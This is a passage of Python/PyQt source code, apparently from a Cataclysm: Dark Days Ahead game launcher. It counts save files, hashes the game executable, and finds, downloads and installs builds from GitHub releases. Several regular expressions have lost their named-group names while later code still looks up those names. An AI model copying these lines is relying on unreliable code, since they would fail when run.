self.saves_value_edit.setText(_('Unknown'))\n\n save_dir = os.path.join(self.game_dir, 'save')\n if not os.path.isdir(save_dir):\n self.saves_value_edit.setText(\n '{world_count} {worlds} - {character_count} {characters}'\n .format(\n world_count=0,\n character_count=0,\n worlds=ngettext('World', 'Worlds', 0),\n characters=ngettext('Character', 'Characters', 0)\n )\n )\n return\n\n timer = QTimer(self)\n self.update_saves_timer = timer\n\n self.saves_size = 0\n self.saves_worlds = 0\n self.saves_characters = 0\n self.world_dirs = set()\n\n self.saves_scan = scandir(save_dir)\n self.next_scans = []\n self.save_dir = save_dir\n\n def timeout():\n try:\n entry = next(self.saves_scan)\n if entry.is_dir():\n self.next_scans.append(entry.path)\n elif entry.is_file():\n self.saves_size += entry.stat().st_size\n\n if entry.name.endswith('.sav'):\n world_dir = os.path.dirname(entry.path)\n if self.save_dir == os.path.dirname(world_dir):\n self.saves_characters += 1\n\n if entry.name in cons.WORLD_FILES:\n world_dir = os.path.dirname(entry.path)\n if (world_dir not in self.world_dirs\n and self.save_dir == os.path.dirname(world_dir)):\n self.world_dirs.add(world_dir)\n self.saves_worlds += 1\n\n worlds_text = ngettext('World', 'Worlds', self.saves_worlds)\n characters_text = ngettext('Character', 'Characters',self.saves_characters)\n self.saves_value_edit.setText(\n '{world_count} {worlds} - {character_count} {characters} ({size})'\n .format(\n world_count=self.saves_worlds,\n character_count=self.saves_characters,\n size=sizeof_fmt(self.saves_size),\n worlds=worlds_text,\n characters=characters_text\n )\n )\n except StopIteration:\n if len(self.next_scans) > 0:\n self.saves_scan = scandir(self.next_scans.pop())\n else:\n # End of the tree\n self.update_saves_timer.stop()\n self.update_saves_timer = None\n\n # no more path to scan but still 0 chars/worlds\n if self.saves_worlds == 0 and self.saves_characters == 0:\n self.saves_value_edit.setText(\n '{world_count} {worlds} - {character_count} {characters}'\n .format(\n world_count=0,\n character_count=0,\n worlds=ngettext('World', 'Worlds', 0),\n characters=ngettext('Character', 'Characters', 0)\n )\n )\n\n # Warning about saves size\n if (self.saves_size > cons.SAVES_WARNING_SIZE and\n not config_true(get_config_value('prevent_save_move', 'False'))):\n self.saves_warning_label.show()\n else:\n self.saves_warning_label.hide()\n\n timer.timeout.connect(timeout)\n timer.start(0)\n\n def analyse_new_build(self, build):\n game_dir = self.dir_combo.currentText()\n\n self.previous_exe_path = self.exe_path\n self.exe_path = None\n\n console_exe = os.path.join(game_dir, 'cataclysm.exe')\n tiles_exe = os.path.join(game_dir, 'cataclysm-tiles.exe')\n\n exe_path = None\n version_type = None\n if os.path.isfile(console_exe):\n version_type = _('console')\n exe_path = console_exe\n elif os.path.isfile(tiles_exe):\n version_type = _('tiles')\n exe_path = tiles_exe\n\n if version_type is None:\n self.version_value_label.setText(_('Not a CDDA directory'))\n self.build_value_label.setText(_('Unknown'))\n self.current_build = None\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n update_group_box.finish_updating()\n\n self.launch_game_button.setEnabled(False)\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n status_bar.showMessage(_('No executable found in the downloaded '\n 'archive. 
You might want to restore your previous version.'))\n\n else:\n if (self.exe_reading_timer is not None\n and self.exe_reading_timer.isActive()):\n self.exe_reading_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n status_bar.removeWidget(self.reading_label)\n status_bar.removeWidget(self.reading_progress_bar)\n\n status_bar.busy -= 1\n\n self.exe_path = exe_path\n self.version_type = version_type\n self.build_number = build['number']\n self.build_date = build['date']\n\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n\n status_bar.busy += 1\n\n reading_label = QLabel()\n reading_label.setText(_('Reading: {0}').format(self.exe_path))\n status_bar.addWidget(reading_label, 100)\n self.reading_label = reading_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.reading_progress_bar = progress_bar\n\n timer = QTimer(self)\n self.exe_reading_timer = timer\n\n exe_size = os.path.getsize(self.exe_path)\n\n progress_bar.setRange(0, exe_size)\n self.exe_total_read = 0\n\n self.exe_sha256 = hashlib.sha256()\n self.game_version = ''\n\n version_file = os.path.join(game_dir, 'VERSION.txt')\n if os.path.isfile(version_file):\n file_content = None\n with open(version_file, 'r', encoding='utf8') as read_file:\n file_content = read_file.read(1024)\n if file_content is not None:\n match = re.search(r'commit sha: (?P\\S+)', file_content)\n if match:\n commit_sha = match.group('commitsha')\n if len(commit_sha) >= 7:\n self.game_version = commit_sha[:7]\n\n self.opened_exe = open(self.exe_path, 'rb')\n\n def timeout():\n bytes = self.opened_exe.read(cons.READ_BUFFER_SIZE)\n if len(bytes) == 0:\n self.opened_exe.close()\n self.exe_reading_timer.stop()\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n build_date = arrow.get(self.build_date, 'UTC')\n human_delta = safe_humanize(build_date, arrow.utcnow(), locale=self.app_locale)\n self.build_value_label.setText(\n '{build} ({time_delta})'\n .format(build=self.build_number, time_delta=human_delta)\n )\n self.current_build = self.build_number\n\n status_bar.removeWidget(self.reading_label)\n status_bar.removeWidget(self.reading_progress_bar)\n\n status_bar.busy -= 1\n\n sha256 = self.exe_sha256.hexdigest()\n\n stable_version = cons.STABLE_SHA256.get(sha256, None)\n is_stable = stable_version is not None\n\n if is_stable:\n self.game_version = stable_version\n\n if self.game_version == '':\n self.game_version = _('Unknown')\n self.version_value_label.setText(\n '{version} ({type})'\n .format(version=self.game_version, type=self.version_type)\n )\n\n new_build(self.game_version, sha256, is_stable, self.build_number,\n self.build_date)\n\n main_tab = self.get_main_tab()\n update_group_box = main_tab.update_group_box\n\n update_group_box.post_extraction()\n\n else:\n self.exe_total_read += len(bytes)\n self.reading_progress_bar.setValue(self.exe_total_read)\n self.exe_sha256.update(bytes)\n\n timer.timeout.connect(timeout)\n timer.start(0)\n\n\nclass UpdateGroupBox(QGroupBox):\n def __init__(self):\n super(UpdateGroupBox, self).__init__()\n\n self.shown = False\n self.updating = False\n self.close_after_update = False\n self.builds = []\n self.progress_rmtree = None\n self.progress_copy = None\n\n self.qnam = QNetworkAccessManager()\n self.http_reply = None\n\n self.api_reply = None\n self.api_response_content = None\n\n self.find_build_count = 0\n\n layout = QGridLayout()\n\n layout_row = 0\n\n 
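# Rows are added to the grid in order: branch selection (stable or\n        # experimental), platform selection (x64 or x86), the available builds combo\n        # with its refresh and find-build controls, the changelog browser, and the\n        # update button spanning the full width.\n        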
branch_label = QLabel()\n layout.addWidget(branch_label, layout_row, 0, Qt.AlignRight)\n self.branch_label = branch_label\n\n branch_button_group = QButtonGroup()\n self.branch_button_group = branch_button_group\n\n stable_radio_button = QRadioButton()\n layout.addWidget(stable_radio_button, layout_row, 1)\n self.stable_radio_button = stable_radio_button\n branch_button_group.addButton(stable_radio_button)\n\n branch_button_group.buttonClicked.connect(self.branch_clicked)\n\n experimental_radio_button = QRadioButton()\n layout.addWidget(experimental_radio_button, layout_row, 2)\n self.experimental_radio_button = experimental_radio_button\n branch_button_group.addButton(experimental_radio_button)\n\n layout_row = layout_row + 1\n\n platform_label = QLabel()\n layout.addWidget(platform_label, layout_row, 0, Qt.AlignRight)\n self.platform_label = platform_label\n\n platform_button_group = QButtonGroup()\n self.platform_button_group = platform_button_group\n\n x64_radio_button = QRadioButton()\n layout.addWidget(x64_radio_button, layout_row, 1)\n self.x64_radio_button = x64_radio_button\n platform_button_group.addButton(x64_radio_button)\n\n platform_button_group.buttonClicked.connect(self.platform_clicked)\n\n if not is_64_windows():\n x64_radio_button.setEnabled(False)\n\n x86_radio_button = QRadioButton()\n layout.addWidget(x86_radio_button, layout_row, 2)\n self.x86_radio_button = x86_radio_button\n platform_button_group.addButton(x86_radio_button)\n\n layout_row = layout_row + 1\n\n available_builds_label = QLabel()\n layout.addWidget(available_builds_label, layout_row, 0, Qt.AlignRight)\n self.available_builds_label = available_builds_label\n\n builds_combo = QComboBox()\n builds_combo.setEnabled(False)\n self.previous_bc_enabled = False\n builds_combo.addItem(_('Unknown'))\n layout.addWidget(builds_combo, layout_row, 1, 1, 2)\n self.builds_combo = builds_combo\n\n refresh_warning_label = QLabel()\n icon = QApplication.style().standardIcon(QStyle.SP_MessageBoxWarning)\n refresh_warning_label.setPixmap(icon.pixmap(16, 16))\n refresh_warning_label.hide()\n layout.addWidget(refresh_warning_label, layout_row, 3)\n self.refresh_warning_label = refresh_warning_label\n\n refresh_builds_button = QToolButton()\n refresh_builds_button.clicked.connect(self.refresh_builds)\n layout.addWidget(refresh_builds_button, layout_row, 4)\n self.refresh_builds_button = refresh_builds_button\n\n layout_row = layout_row + 1\n\n find_build_label = QLabel()\n layout.addWidget(find_build_label, layout_row, 0, Qt.AlignRight)\n self.find_build_label = find_build_label\n\n find_build_value = QLineEdit()\n find_build_value.setValidator(QRegularExpressionValidator(\n QRegularExpression(r'\\d+(-\\d+)*')))\n find_build_value.returnPressed.connect(self.find_build)\n layout.addWidget(find_build_value, layout_row, 1, 1, 2)\n self.find_build_value = find_build_value\n\n find_build_warning_label = QLabel()\n icon = QApplication.style().standardIcon(QStyle.SP_MessageBoxWarning)\n find_build_warning_label.setPixmap(icon.pixmap(16, 16))\n find_build_warning_label.hide()\n layout.addWidget(find_build_warning_label, layout_row, 3)\n self.find_build_warning_label = find_build_warning_label\n\n find_build_button = QToolButton()\n find_build_button.clicked.connect(self.find_build)\n layout.addWidget(find_build_button, layout_row, 4)\n self.find_build_button = find_build_button\n\n layout_row = layout_row + 1\n\n changelog_groupbox = QGroupBox()\n changelog_layout = QHBoxLayout()\n changelog_groupbox.setLayout(changelog_layout)\n 
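# Release notes are rendered in a read-only QTextBrowser; external links in\n        # the changelog open in the system browser rather than inside the launcher.\n        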
layout.addWidget(changelog_groupbox, layout_row, 0, 1, 5)\n self.changelog_groupbox = changelog_groupbox\n self.changelog_layout = changelog_layout\n\n changelog_content = QTextBrowser()\n changelog_content.setReadOnly(True)\n changelog_content.setOpenExternalLinks(True)\n self.changelog_layout.addWidget(changelog_content)\n self.changelog_content = changelog_content\n\n layout_row = layout_row + 1\n\n update_button = QPushButton()\n update_button.setEnabled(False)\n self.previous_ub_enabled = False\n update_button.setStyleSheet('font-size: 20px;')\n update_button.clicked.connect(self.update_game)\n layout.addWidget(update_button, layout_row, 0, 1, 5)\n self.update_button = update_button\n\n layout.setColumnStretch(1, 100)\n layout.setColumnStretch(2, 100)\n\n self.setLayout(layout)\n self.set_text()\n\n def set_text(self):\n self.branch_label.setText(_('Branch:'))\n self.stable_radio_button.setText(_('Stable'))\n self.experimental_radio_button.setText(_('Experimental'))\n self.platform_label.setText(_('Platform:'))\n self.x64_radio_button.setText('{so} ({bit})'.format(so=_('Windows x64'), bit=_('64-bit')))\n self.x86_radio_button.setText('{so} ({bit})'.format(so=_('Windows x86'), bit=_('32-bit')))\n self.available_builds_label.setText(_('Available builds:'))\n self.find_build_label.setText(_('Find build #:'))\n self.find_build_button.setText(_('Add to list'))\n self.refresh_builds_button.setText(_('Refresh'))\n self.changelog_groupbox.setTitle(_('Changelog'))\n self.update_button.setText(_('Update game'))\n self.setTitle(_('Update/Installation'))\n\n def showEvent(self, event):\n if not self.shown:\n branch = get_config_value(cons.CONFIG_BRANCH_KEY)\n\n if branch is None or branch not in (cons.CONFIG_BRANCH_STABLE,\n cons.CONFIG_BRANCH_EXPERIMENTAL):\n branch = cons.CONFIG_BRANCH_EXPERIMENTAL\n\n if branch == cons.CONFIG_BRANCH_STABLE:\n self.stable_radio_button.setChecked(True)\n elif branch == cons.CONFIG_BRANCH_EXPERIMENTAL:\n self.experimental_radio_button.setChecked(True)\n\n platform = get_config_value('platform')\n\n if platform == 'Windows x64':\n platform = 'x64'\n elif platform == 'Windows x86':\n platform = 'x86'\n\n if platform is None or platform not in ('x64', 'x86'):\n if is_64_windows():\n platform = 'x64'\n else:\n platform = 'x86'\n\n if platform == 'x64':\n self.x64_radio_button.setChecked(True)\n elif platform == 'x86':\n self.x86_radio_button.setChecked(True)\n\n self.show_hide_find_build()\n\n self.refresh_builds()\n\n self.shown = True\n\n def find_build(self):\n build_number = self.find_build_value.text()\n build_number = build_number.strip()\n\n build_number = re.sub(r'[^0-9\\-]', '', build_number)\n\n if build_number == '':\n return\n\n if self.find_build_count == 0:\n url = cons.GITHUB_REST_API_URL + cons.CDDA_RELEASE_BY_TAG(cons.BUILD_TAG(build_number))\n self.find_build_count = 1\n elif self.find_build_count == 1:\n url = cons.GITHUB_REST_API_URL + cons.CDDA_RELEASE_BY_TAG(\n cons.NEW_BUILD_TAG(build_number))\n self.find_build_count = 0\n\n self.api_response_content = BytesIO()\n\n request = QNetworkRequest(QUrl(url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n request.setRawHeader(b'Accept', cons.GITHUB_API_VERSION)\n\n self.api_reply = self.qnam.get(request)\n self.api_reply.finished.connect(self.find_build_finished)\n self.api_reply.readyRead.connect(self.find_build_ready_read)\n\n def find_build_finished(self):\n redirect = self.api_reply.attribute(\n QNetworkRequest.RedirectionTargetAttribute)\n if redirect 
is not None:\n redirected_url = urljoin(\n self.api_reply.request().url().toString(),\n redirect.toString())\n\n self.api_response_content = BytesIO()\n\n request = QNetworkRequest(QUrl(redirected_url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n request.setRawHeader(b'Accept', cons.GITHUB_API_VERSION)\n\n self.api_reply = self.qnam.get(request)\n self.api_reply.finished.connect(self.find_build_finished)\n self.api_reply.readyRead.connect(self.find_build_ready_read)\n return\n \n requests_remaining = None\n if self.api_reply.hasRawHeader(cons.GITHUB_XRL_REMAINING):\n requests_remaining = self.api_reply.rawHeader(cons.GITHUB_XRL_REMAINING)\n requests_remaining = tryint(requests_remaining)\n\n reset_dt = None\n if self.api_reply.hasRawHeader(cons.GITHUB_XRL_RESET):\n reset_dt = self.api_reply.rawHeader(cons.GITHUB_XRL_RESET)\n reset_dt = tryint(reset_dt)\n reset_dt = arrow.get(reset_dt)\n\n if requests_remaining is not None and requests_remaining <= 10:\n self.warn_rate_limit(requests_remaining, reset_dt)\n \n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_code = self.api_reply.attribute(\n QNetworkRequest.HttpStatusCodeAttribute)\n if status_code != 200:\n self.api_response_content = None\n\n build_number = self.find_build_value.text()\n build_number = build_number.strip()\n\n if self.find_build_count == 0:\n status_bar.showMessage(_('Build #{build} not found on GitHub'\n ).format(build=build_number))\n return\n elif self.find_build_count == 1:\n self.find_build()\n return\n\n self.api_response_content.seek(0)\n try:\n release = json.loads(TextIOWrapper(self.api_response_content, encoding='utf8'\n ).read())\n except json.decoder.JSONDecodeError:\n release = None\n self.api_response_content = None\n\n if release is None:\n return\n \n builds = self.builds\n\n asset_platform = self.base_asset['Platform']\n asset_graphics = self.base_asset['Graphics']\n\n target_regex = re.compile(r'cataclysmdda-(?P.+)-' +\n re.escape(asset_platform) + r'-' +\n re.escape(asset_graphics) + r'-' +\n r'b?(?P\\d+)\\.zip'\n )\n \n new_asset_platform = self.new_base_asset['Platform']\n new_asset_graphics = self.new_base_asset['Graphics']\n\n new_target_regex = re.compile(\n r'cdda-windows-' +\n re.escape(new_asset_graphics) + r'-' +\n re.escape(new_asset_platform) + r'-' +\n r'b?(?P[0-9\\-]+)\\.zip'\n )\n\n build_regex = re.compile(r'[Bb]uild #?(?P[0-9\\-]+)')\n\n if any(x not in release for x in ('name', 'created_at')):\n return\n\n build_match = build_regex.search(release['name'])\n build_number = None\n if build_match is not None:\n asset = None\n if 'assets' in release:\n asset_iter = (\n x for x in release['assets']\n if 'browser_download_url' in x\n and 'name' in x\n and (\n target_regex.search(x['name']) is not None or\n new_target_regex.search(x['name']) is not None )\n )\n asset = next(asset_iter, None)\n\n build = {\n 'url': asset['browser_download_url'] if asset is not None\n else None,\n 'name': asset['name'] if asset is not None else None,\n 'number': build_match.group('build'),\n 'date': arrow.get(release['created_at']).datetime\n }\n build_number = build['number']\n\n self.find_build_value.setText('')\n\n for existing_build in builds:\n if existing_build['number'] == build_number:\n status_bar.showMessage(\n _('Build #{build} is already in the available builds list'\n ).format(build=build_number))\n return\n\n builds.append(build)\n\n status_bar.showMessage(_('Build #{build} found and added to the available builds 
list'\n ).format(build=build_number))\n else:\n return\n\n if len(builds) > 0:\n builds.sort(key=lambda x: (x['date'], x['number']), reverse=True)\n self.builds = builds\n\n self.builds_combo.clear()\n for build in builds:\n if build['date'] is not None:\n build_date = arrow.get(build['date'], 'UTC')\n human_delta = safe_humanize(build_date, arrow.utcnow(),\n locale=self.app_locale)\n else:\n human_delta = _('Unknown')\n\n self.builds_combo.addItem(\n '{number} ({delta})'.format(number=build['number'], delta=human_delta),\n userData=build\n )\n\n combo_model = self.builds_combo.model()\n default_set = False\n for x in range(combo_model.rowCount()):\n if combo_model.item(x).data(Qt.UserRole)['url'] is None:\n combo_model.item(x).setEnabled(False)\n combo_model.item(x).setText(combo_model.item(x).text() +\n _(' - build unavailable'))\n elif not default_set:\n default_set = True\n combo_model.item(x).setText(combo_model.item(x).text() +\n _(' - latest build available'))\n\n if (combo_model.item(x).data(Qt.UserRole)['number'] == build_number and\n combo_model.item(x).isEnabled()):\n self.builds_combo.setCurrentIndex(x)\n self.find_build_count = 0\n elif self.find_build_count == 1:\n self.find_build()\n\n def find_build_ready_read(self):\n self.api_response_content.write(self.api_reply.readAll())\n\n def update_game(self):\n if not self.updating:\n if self.builds is None or len(self.builds) < 1:\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Cannot update or install the game '\n 'since no build was found'))\n return\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n game_dir = game_dir_group_box.dir_combo.currentText()\n\n # Check if we are installing in an empty directory\n if (game_dir_group_box.exe_path is None and\n os.path.exists(game_dir) and\n os.path.isdir(game_dir)):\n\n current_scan = scandir(game_dir)\n game_dir_empty = True\n\n try:\n next(current_scan)\n game_dir_empty = False\n except StopIteration:\n pass\n\n if not game_dir_empty:\n subdir_name = 'cdda'\n subdir = os.path.join(game_dir, subdir_name)\n\n while os.path.exists(subdir):\n subdir_name = 'cdda-{0}'.format('%08x' % random.randrange(16**8))\n subdir = os.path.join(game_dir, subdir_name)\n\n new_subdirectory_msgbox = QMessageBox()\n new_subdirectory_msgbox.setWindowTitle(_('Install directory is not empty'))\n new_subdirectory_msgbox.setText(_('You cannot install the game in a directory '\n 'that is not empty. 
We can quickly proceed with a new subdirectory.'\n ))\n new_subdirectory_msgbox.setInformativeText(_('Can we create a new empty '\n 'subdirectory to proceed?'))\n new_subdirectory_msgbox.addButton(_('Create the {name} subdirectory and '\n 'proceed').format(name=subdir_name),\n QMessageBox.YesRole)\n new_subdirectory_msgbox.addButton(_('I will choose or create a different '\n 'directory'), QMessageBox.NoRole)\n new_subdirectory_msgbox.setIcon(QMessageBox.Question)\n\n if new_subdirectory_msgbox.exec() == 1:\n return\n \n os.makedirs(subdir)\n game_dir = subdir\n game_dir_group_box.set_dir_combo_value(subdir)\n\n if config_true(get_config_value('backup_before_update', 'False')):\n backups_tab = main_tab.get_backups_tab()\n\n backups_tab.prune_auto_backups()\n\n name = '{auto}_{name}'.format(auto=_('auto'),\n name=_('before_update'))\n\n backups_tab.after_backup = self.update_game_process\n backups_tab.backup_saves(name)\n else:\n self.update_game_process()\n\n else:\n # We are currently updating, try to cancel\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n # Are we downloading the file?\n if self.download_http_reply.isRunning():\n self.download_aborted = True\n self.download_http_reply.abort()\n\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n\n if game_dir_group_box.exe_path is not None:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Update cancelled'))\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Installation cancelled'))\n elif self.clearing_previous_dir:\n if self.progress_rmtree is not None:\n self.progress_rmtree.stop()\n elif self.backing_up_game:\n self.backup_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.backup_label)\n status_bar.removeWidget(self.backup_progress_bar)\n\n status_bar.busy -= 1\n\n self.restore_backup()\n\n if game_dir_group_box.exe_path is not None:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Update cancelled'))\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Installation cancelled'))\n\n elif self.extracting_new_build:\n self.extracting_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.extracting_label)\n status_bar.removeWidget(self.extracting_progress_bar)\n\n status_bar.busy -= 1\n\n self.extracting_zipfile.close()\n\n download_dir = os.path.dirname(self.downloaded_file)\n delete_path(download_dir)\n\n path = self.clean_game_dir()\n self.restore_backup()\n self.restore_previous_content(path)\n\n if path is not None:\n delete_path(path)\n\n if game_dir_group_box.exe_path is not None:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Update cancelled'))\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Installation cancelled'))\n elif self.analysing_new_build:\n game_dir_group_box.opened_exe.close()\n game_dir_group_box.exe_reading_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(game_dir_group_box.reading_label)\n status_bar.removeWidget(game_dir_group_box.reading_progress_bar)\n\n status_bar.busy -= 1\n\n path = self.clean_game_dir()\n self.restore_backup()\n self.restore_previous_content(path)\n\n if path is not None:\n delete_path(path)\n\n if game_dir_group_box.exe_path is not None:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Update cancelled'))\n else:\n if status_bar.busy == 0:\n 
status_bar.showMessage(_('Installation cancelled'))\n elif self.in_post_extraction:\n self.in_post_extraction = False\n\n if self.progress_copy is not None:\n self.progress_copy.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n\n path = self.clean_game_dir()\n self.restore_backup()\n self.restore_previous_content(path)\n\n if path is not None:\n delete_path(path)\n\n if game_dir_group_box.exe_path is not None:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Update cancelled'))\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Installation cancelled'))\n\n self.finish_updating()\n\n def update_game_process(self):\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n game_dir = game_dir_group_box.dir_combo.currentText()\n \n logger.info(\n 'Updating CDDA...\\n'\n 'CDDAGL Directory: {}\\n'\n 'CDDA Directory: {}'\n .format(get_cddagl_path(), game_dir)\n )\n\n self.updating = True\n self.download_aborted = False\n self.clearing_previous_dir = False\n self.backing_up_game = False\n self.extracting_new_build = False\n self.analysing_new_build = False\n self.in_post_extraction = False\n\n self.selected_build = self.builds[self.builds_combo.currentIndex()]\n\n selected_branch = self.branch_button_group.checkedButton()\n experimental_selected = selected_branch is self.experimental_radio_button\n\n latest_build = self.builds[0]\n if experimental_selected and game_dir_group_box.current_build == latest_build['number']:\n confirm_msgbox = QMessageBox()\n confirm_msgbox.setWindowTitle(_('Game is up to date'))\n confirm_msgbox.setText(_('You already have the latest version.'\n ))\n confirm_msgbox.setInformativeText(_('Are you sure you want to '\n 'update your game?'))\n confirm_msgbox.addButton(_('Update the game again'),\n QMessageBox.YesRole)\n confirm_msgbox.addButton(_('I do not need to update the '\n 'game again'), QMessageBox.NoRole)\n confirm_msgbox.setIcon(QMessageBox.Question)\n\n if confirm_msgbox.exec() == 1:\n self.updating = False\n return\n\n game_dir_group_box.disable_controls()\n self.disable_controls()\n\n soundpacks_tab = main_tab.get_soundpacks_tab()\n mods_tab = main_tab.get_mods_tab()\n settings_tab = main_tab.get_settings_tab()\n backups_tab = main_tab.get_backups_tab()\n\n soundpacks_tab.disable_tab()\n mods_tab.disable_tab()\n settings_tab.disable_tab()\n backups_tab.disable_tab()\n\n try:\n if not os.path.exists(game_dir):\n os.makedirs(game_dir)\n elif os.path.isfile(game_dir):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.showMessage(_('Cannot install game on a file'))\n\n self.finish_updating()\n return\n\n download_dir = tempfile.mkdtemp(prefix=cons.TEMP_PREFIX)\n\n download_url = self.selected_build['url']\n\n url = QUrl(download_url)\n file_info = QFileInfo(url.path())\n file_name = file_info.fileName()\n\n self.downloaded_file = os.path.join(download_dir, file_name)\n self.downloading_file = open(self.downloaded_file, 'wb')\n\n self.download_game_update(download_url)\n\n except OSError as e:\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n self.finish_updating()\n\n status_bar.showMessage(str(e))\n\n def clean_game_dir(self):\n game_dir = self.game_dir\n dir_list = os.listdir(game_dir)\n if len(dir_list) == 0 or (\n len(dir_list) == 1 and dir_list[0] == 'previous_version'):\n return None\n\n temp_move_dir = tempfile.mkdtemp(prefix=cons.TEMP_PREFIX)\n\n excluded_entries = 
set(['previous_version'])\n if config_true(get_config_value('prevent_save_move', 'False')):\n excluded_entries.add('save')\n # Prevent moving the launcher if it's in the game directory\n launcher_exe = os.path.abspath(sys.executable)\n launcher_dir = os.path.dirname(launcher_exe)\n if os.path.abspath(game_dir) == launcher_dir:\n excluded_entries.add(os.path.basename(launcher_exe))\n for entry in dir_list:\n if entry not in excluded_entries:\n entry_path = os.path.join(game_dir, entry)\n shutil.move(entry_path, temp_move_dir)\n\n return temp_move_dir\n\n def restore_previous_content(self, path):\n if path is None:\n return\n\n game_dir = self.game_dir\n previous_version_dir = os.path.join(game_dir, 'previous_version')\n if not os.path.exists(previous_version_dir):\n os.makedirs(previous_version_dir)\n\n for entry in os.listdir(path):\n entry_path = os.path.join(path, entry)\n shutil.move(entry_path, previous_version_dir)\n\n def restore_backup(self):\n game_dir = self.game_dir\n previous_version_dir = os.path.join(game_dir, 'previous_version')\n\n if os.path.isdir(previous_version_dir) and os.path.isdir(game_dir):\n\n for entry in os.listdir(previous_version_dir):\n if (entry == 'save' and\n config_true(get_config_value('prevent_save_move',\n 'False'))):\n continue\n entry_path = os.path.join(previous_version_dir, entry)\n shutil.move(entry_path, game_dir)\n\n delete_path(previous_version_dir)\n\n def get_main_tab(self):\n return self.parentWidget()\n\n def get_main_window(self):\n return self.get_main_tab().get_main_window()\n\n def disable_controls(self, update_button=False):\n self.stable_radio_button.setEnabled(False)\n self.experimental_radio_button.setEnabled(False)\n\n self.x64_radio_button.setEnabled(False)\n self.x86_radio_button.setEnabled(False)\n\n self.previous_bc_enabled = self.builds_combo.isEnabled()\n self.builds_combo.setEnabled(False)\n self.refresh_builds_button.setEnabled(False)\n self.find_build_value.setEnabled(False)\n self.find_build_button.setEnabled(False)\n\n self.previous_ub_enabled = self.update_button.isEnabled()\n if update_button:\n self.update_button.setEnabled(False)\n\n def enable_controls(self, builds_combo=False):\n self.stable_radio_button.setEnabled(True)\n self.experimental_radio_button.setEnabled(True)\n\n if is_64_windows():\n self.x64_radio_button.setEnabled(True)\n self.x86_radio_button.setEnabled(True)\n\n self.refresh_builds_button.setEnabled(True)\n self.find_build_value.setEnabled(True)\n self.find_build_button.setEnabled(True)\n\n if builds_combo:\n self.builds_combo.setEnabled(True)\n else:\n self.builds_combo.setEnabled(self.previous_bc_enabled)\n\n self.update_button.setEnabled(self.previous_ub_enabled)\n\n def download_game_update(self, url):\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n\n status_bar.busy += 1\n\n downloading_label = QLabel()\n downloading_label.setText(_('Downloading: {0}').format(url))\n status_bar.addWidget(downloading_label, 100)\n self.downloading_label = downloading_label\n\n dowloading_speed_label = QLabel()\n status_bar.addWidget(dowloading_speed_label)\n self.dowloading_speed_label = dowloading_speed_label\n\n downloading_size_label = QLabel()\n status_bar.addWidget(downloading_size_label)\n self.downloading_size_label = downloading_size_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.downloading_progress_bar = progress_bar\n progress_bar.setMinimum(0)\n\n self.download_last_read = datetime.utcnow()\n 
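# These counters feed download_dl_progress: every fifth progress signal, the\n        # bytes received since the last sample are divided by the elapsed wall-clock\n        # time to update the download speed label.\n        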
self.download_last_bytes_read = 0\n self.download_speed_count = 0\n\n request = QNetworkRequest(QUrl(url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n\n self.download_http_reply = self.qnam.get(request)\n self.download_http_reply.finished.connect(self.download_http_finished)\n self.download_http_reply.readyRead.connect(\n self.download_http_ready_read)\n self.download_http_reply.downloadProgress.connect(\n self.download_dl_progress)\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n if game_dir_group_box.exe_path is not None:\n self.update_button.setText(_('Cancel update'))\n else:\n self.update_button.setText(_('Cancel installation'))\n\n def download_http_finished(self):\n self.downloading_file.close()\n\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n status_bar.removeWidget(self.downloading_label)\n status_bar.removeWidget(self.dowloading_speed_label)\n status_bar.removeWidget(self.downloading_size_label)\n status_bar.removeWidget(self.downloading_progress_bar)\n\n status_bar.busy -= 1\n\n if self.download_aborted:\n download_dir = os.path.dirname(self.downloaded_file)\n delete_path(download_dir)\n else:\n redirect = self.download_http_reply.attribute(\n QNetworkRequest.RedirectionTargetAttribute)\n if redirect is not None:\n redirected_url = urljoin(\n self.download_http_reply.request().url().toString(),\n redirect.toString())\n\n downloading_label = QLabel()\n downloading_label.setText(_('Downloading: {0}').format(\n redirected_url))\n status_bar.addWidget(downloading_label, 100)\n self.downloading_label = downloading_label\n\n dowloading_speed_label = QLabel()\n status_bar.addWidget(dowloading_speed_label)\n self.dowloading_speed_label = 